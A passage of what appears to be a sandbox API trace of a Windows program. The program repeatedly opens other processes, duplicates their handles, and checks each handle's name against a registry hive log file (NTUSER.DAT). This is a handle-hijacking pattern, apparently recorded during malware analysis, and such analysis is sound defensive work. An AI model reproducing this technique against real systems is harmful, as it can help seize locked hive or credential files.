GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.871] CloseHandle (hObject=0x1e4) returned 1 [0162.871] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.871] CloseHandle (hObject=0x194) returned 1 [0162.871] CloseHandle (hObject=0x1e8) returned 1 [0162.871] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0162.871] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.872] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.873] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.873] CloseHandle (hObject=0x1e4) returned 1 [0162.873] CloseHandle (hObject=0x194) returned 1 [0162.873] CloseHandle (hObject=0x1e8) returned 1 [0162.873] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0162.873] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.874] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.875] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.875] CloseHandle (hObject=0x1e4) returned 1 [0162.875] CloseHandle (hObject=0x194) returned 1 [0162.875] CloseHandle (hObject=0x1e8) returned 1 [0162.875] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0162.875] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.875] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.876] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.877] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.877] CloseHandle (hObject=0x1e4) returned 1 [0162.877] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.877] CloseHandle (hObject=0x194) returned 1 [0162.877] CloseHandle (hObject=0x1e8) returned 1 [0162.877] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0162.877] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x190, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.878] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.878] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.879] CloseHandle (hObject=0x1e4) returned 1 [0162.879] _wcsicmp (_Str1="\\es.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.879] CloseHandle (hObject=0x194) returned 1 [0162.879] CloseHandle (hObject=0x1e8) returned 1 [0162.879] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0162.879] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.879] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.880] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.880] CloseHandle (hObject=0x1e4) returned 1 [0162.880] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.880] CloseHandle (hObject=0x194) returned 1 [0162.881] CloseHandle (hObject=0x1e8) returned 1 [0162.881] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.881] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.882] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.882] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.883] CloseHandle (hObject=0x1e4) returned 1 [0162.883] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.883] CloseHandle (hObject=0x194) returned 1 [0162.883] CloseHandle (hObject=0x1e8) returned 1 [0162.883] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.883] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.883] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.884] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.884] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.884] CloseHandle (hObject=0x1e4) returned 1 [0162.884] CloseHandle (hObject=0x194) returned 1 [0162.884] CloseHandle (hObject=0x1e8) returned 1 [0162.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.885] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.885] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.885] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.886] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.886] CloseHandle (hObject=0x1e4) returned 1 [0162.886] CloseHandle (hObject=0x194) returned 1 [0162.886] CloseHandle (hObject=0x1e8) returned 1 [0162.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.886] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.887] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.887] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.888] CloseHandle (hObject=0x1e4) returned 1 [0162.888] _wcsicmp (_Str1="\\etc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.888] CloseHandle (hObject=0x194) returned 1 [0162.888] CloseHandle (hObject=0x1e8) returned 1 [0162.888] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.888] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.889] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.890] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.890] CloseHandle (hObject=0x1e4) returned 1 [0162.890] CloseHandle (hObject=0x194) returned 1 [0162.890] CloseHandle (hObject=0x1e8) returned 1 [0162.890] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.890] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.891] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.892] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.892] CloseHandle (hObject=0x1e4) returned 1 [0162.892] CloseHandle (hObject=0x194) returned 1 [0162.892] CloseHandle (hObject=0x1e8) returned 1 [0162.893] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.893] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.894] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.894] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.895] CloseHandle (hObject=0x1e4) returned 1 [0162.895] CloseHandle (hObject=0x194) returned 1 [0162.895] CloseHandle (hObject=0x1e8) returned 1 [0162.895] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.895] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.896] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.897] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.897] CloseHandle (hObject=0x1e4) returned 1 [0162.897] CloseHandle (hObject=0x194) returned 1 [0162.897] CloseHandle (hObject=0x1e8) returned 1 [0162.897] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.897] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.898] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.902] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.902] CloseHandle (hObject=0x1e4) returned 1 [0162.902] CloseHandle (hObject=0x194) returned 1 [0162.902] CloseHandle (hObject=0x1e8) returned 1 [0162.902] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.902] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.903] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.904] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.904] CloseHandle (hObject=0x1e4) returned 1 [0162.904] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.904] CloseHandle (hObject=0x194) returned 1 [0162.904] CloseHandle (hObject=0x1e8) returned 1 [0162.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.905] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.905] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.906] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.906] CloseHandle (hObject=0x1e4) returned 1 [0162.907] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.907] CloseHandle (hObject=0x194) returned 1 [0162.907] CloseHandle (hObject=0x1e8) returned 1 [0162.907] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.907] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.908] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.909] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.909] CloseHandle (hObject=0x1e4) returned 1 [0162.909] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.909] CloseHandle (hObject=0x194) returned 1 [0162.909] CloseHandle (hObject=0x1e8) returned 1 [0162.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.909] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.910] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.911] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.911] CloseHandle (hObject=0x1e4) returned 1 [0162.911] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.911] CloseHandle (hObject=0x194) returned 1 [0162.912] CloseHandle (hObject=0x1e8) returned 1 [0162.912] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.912] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.912] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.913] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.913] CloseHandle (hObject=0x1e4) returned 1 [0162.913] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.913] CloseHandle (hObject=0x194) returned 1 [0162.913] CloseHandle (hObject=0x1e8) returned 1 [0162.913] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.913] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.914] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.915] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.915] CloseHandle (hObject=0x1e4) returned 1 [0162.915] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.915] CloseHandle (hObject=0x194) returned 1 [0162.915] CloseHandle (hObject=0x1e8) returned 1 [0162.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.915] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.916] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.917] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.917] CloseHandle (hObject=0x1e4) returned 1 [0162.918] CloseHandle (hObject=0x194) returned 1 [0162.918] CloseHandle (hObject=0x1e8) returned 1 [0162.918] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.918] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.918] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.919] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.919] CloseHandle (hObject=0x1e4) returned 1 [0162.919] CloseHandle (hObject=0x194) returned 1 [0162.919] CloseHandle (hObject=0x1e8) returned 1 [0162.919] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.919] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.920] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.922] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.922] CloseHandle (hObject=0x1e4) returned 1 [0162.922] CloseHandle (hObject=0x194) returned 1 [0162.922] CloseHandle (hObject=0x1e8) returned 1 [0162.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.922] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.923] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.923] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.923] CloseHandle (hObject=0x1e4) returned 1 [0162.924] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.924] CloseHandle (hObject=0x194) returned 1 [0162.924] CloseHandle (hObject=0x1e8) returned 1 [0162.924] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.924] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.925] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.925] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.925] CloseHandle (hObject=0x1e4) returned 1 [0162.926] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.926] CloseHandle (hObject=0x194) returned 1 [0162.926] CloseHandle (hObject=0x1e8) returned 1 [0162.926] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.926] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.927] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.927] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.928] CloseHandle (hObject=0x1e4) returned 1 [0162.928] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.928] CloseHandle (hObject=0x194) returned 1 [0162.928] CloseHandle (hObject=0x1e8) returned 1 [0162.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0162.928] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.929] WaitForSingleObject (hHandle=0x1e4, 